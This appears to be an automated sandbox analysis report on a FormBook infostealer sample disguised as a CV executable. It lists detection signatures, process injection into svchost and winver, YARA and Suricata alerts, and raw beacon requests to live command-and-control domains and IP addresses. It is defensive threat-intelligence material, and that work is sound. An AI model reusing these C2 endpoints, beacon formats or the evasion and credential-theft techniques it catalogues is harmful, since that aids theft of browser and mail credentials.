Windows Analysis Report
CV Lic H&S Olivetti Renzo.exe

Overview

General Information

Sample name:CV Lic H&S Olivetti Renzo.exe
Analysis ID:1561733
MD5:dffcfc55dbe3596498888c48f569adcd
SHA1:0a75b7cdb8ded9722a7f2188777793c6c62a178b
SHA256:1dae087c41578f5a3a6ed11bbe54efa045598e2bdccf54db0315bbbe36fc1956
Tags:exe, user-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • CV Lic H&S Olivetti Renzo.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe" MD5: DFFCFC55DBE3596498888C48F569ADCD)
    • svchost.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • DIRZUznVUfWlad.exe (PID: 5728 cmdline: "C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winver.exe (PID: 7884 cmdline: "C:\Windows\SysWOW64\winver.exe" MD5: B5471B0FB5402FC318C82C994C6BF84D)
          • DIRZUznVUfWlad.exe (PID: 4544 cmdline: "C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8032 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.4145192791.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2031660118.00000000038D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4145128691.0000000004B60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2036469634.0000000004000000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000001.00000002.2031290785.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe" , CommandLine: "C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe, NewProcessName: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe, OriginalFileName: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe, ParentCommandLine: "C:\Windows\SysWOW64\winver.exe", ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 7884, ParentProcessName: winver.exe, ProcessCommandLine: "C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe" , ProcessId: 4544, ProcessName: DIRZUznVUfWlad.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine|base64offset|contains: .', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ParentImage: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, ParentProcessId: 7492, ParentProcessName: CV Lic H&S Olivetti Renzo.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ProcessId: 7520, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine|base64offset|contains: .', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ParentImage: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, ParentProcessId: 7492, ParentProcessName: CV Lic H&S Olivetti Renzo.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ProcessId: 7520, ProcessName: svchost.exe

                AV Detection

                Source: CV Lic H&S Olivetti Renzo.exeReversingLabs: Detection: 71%
                Source: CV Lic H&S Olivetti Renzo.exeVirustotal: Detection: 73%
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4145192791.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2031660118.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4145128691.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2036469634.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2031290785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4145164327.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4143976665.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: CV Lic H&S Olivetti Renzo.exeJoe Sandbox ML: detected
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: winver.pdb source: svchost.exe, 00000001.00000003.1999929496.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2000000788.000000000343B000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000003.1987572224.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DIRZUznVUfWlad.exe, 00000005.00000000.1954793647.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4144891699.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700519425.0000000004110000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700185346.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032630378.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1938129987.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032630378.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1939807476.0000000003800000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2031398698.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2038921468.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.000000000514E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700519425.0000000004110000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700185346.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2032630378.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1938129987.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032630378.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1939807476.0000000003800000.00000004.00000020.00020000.00000000.sdmp, winver.exe, winver.exe, 00000006.00000003.2031398698.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2038921468.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.000000000514E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000001.00000003.1999929496.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2000000788.000000000343B000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000003.1987572224.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_003C6CA9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003C60DD
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003C63F9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003CEB60
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CF56F FindFirstFileW,FindClose,0_2_003CF56F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003CF5FA
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003D1B2F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003D1C8A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003D1F94
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0301C740 FindFirstFileW,FindNextFileW,FindClose,6_2_0301C740
                Source: C:\Windows\SysWOW64\winver.exeCode function: 4x nop then xor eax, eax6_2_03009E10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 4x nop then mov ebx, 00000004h6_2_04DE04E8

                Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49798 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49777 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 76.223.74.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49842 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49835 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49909 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49817 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49848 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49854 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49886 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49917 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49924 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49958 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49931 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49810 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49870 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49952 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49972 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50010 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49893 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50042 -> 104.21.42.77:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 104.21.42.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50050 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 104.21.42.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49997 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 104.21.42.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49804 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49991 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50046 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49965 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50004 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49880 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 13.248.169.48:80
                Source: DNS query: www.fortevision.xyz
                Source: DNS query: www.rtpterbaruwaktu3.xyz
                Source: DNS query: www.tals.xyz
                Source: Joe Sandbox ViewIP Address: 203.161.43.228 203.161.43.228
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe Code function: 0_2_003D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003D4EB5
                Source: global traffic HTTP traffic detected: GET /wu6o/?3vNdCBvX=PAJ2EBywaoPRtAOAuLkHmGqEo3O5GOPxYR74cZ8tmddFXtcUCShy8K9wuzURMr8ccmGJKuqH2xFlcoIZXBvtCvBZNCCQMFI+vTFboLP2ZRmMaANZD1baSXk=&etx=BXy4elO0X HTTP/1.1 Host: www.grandesofertas.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global traffic HTTP traffic detected: GET /z9pi/?3vNdCBvX=ied+cptg7UakpzhOx9uXTlAGHDuhbT7ej64IZr/ehzcWgm5THakcORsiVprqoW37b/eRnRq1Qh5X/LbXYJipvFkLuNeVdA8j2seJJxWGnVEyQ8hCuTv0uPE=&etx=BXy4elO0X HTTP/1.1 Host: www.jijievo.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global traffic HTTP traffic detected: GET /8qt7/?3vNdCBvX=FpCuTMU+yGtduI5SdGSwoaTqY2YvqsELSpRJwwRFNKDd6qo9VMAnWwDYglhkdC4Vi65aP7UQN4CBUilkwxZXjJlaW2N0MrSdIjCq1nBCaRQTsV/7KTtyEyY=&etx=BXy4elO0X HTTP/1.1 Host: www.ytsd88.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global traffic HTTP traffic detected: GET /mlxg/?3vNdCBvX=cQzZIkxePH03UbtTShzK+VL4o2HqQJS38l8io/jKjoXZ1YEXRx5ntf5pTkNOcA/fsinJED0Fc0Ua6QV4aMGrbeJFZzqSBCnp1w20sGwly8q3n1+yWGeN50w=&etx=BXy4elO0X HTTP/1.1 Host: www.bpgroup.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global traffic HTTP traffic detected: GET /dash/?etx=BXy4elO0X&3vNdCBvX=YMHBudoHIUxH+uWIVKjvQ5iF9tPwkJokcjAI4kujT8yqZMh8PwdCYhUcXF8Hm7NuwJrkm81K0kAXhGwUtx1Q0LUsa6Gef/JbuNbn4M13wkoCvJOzh8OnTqA= HTTP/1.1 Host: www.fortevision.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global traffic HTTP traffic detected: GET /mv7p/?3vNdCBvX=5Xkb80UCbQYKeySKU05ZgY0hyXkWVD4R8td5rEUSu2Sur2yiMTlgkW/d3b9rVTV1/KKKFkoFavUE13Uu3OCOGKEDCrVhSay3c3WH5ydFiaohW8mA4vlt7iA=&etx=BXy4elO0X HTTP/1.1 Host: www.rtpterbaruwaktu3.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                Source: global traffic HTTP traffic detected: GET /cm9a/?etx=BXy4elO0X&3vNdCBvX=AvN42DnS9Qw3kn1S+XKBV+xTI9DBYK88wu7Mj7dY/pRaa7659YJNcYiJunyE7nDkkRGZb81LCaJ1YXfnfuSvqBbKt/3mV1eMDkmtL8V6ExRSF03F7PAG84A= HTTP/1.1 Host: www.prhmcjdz.tokyo Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
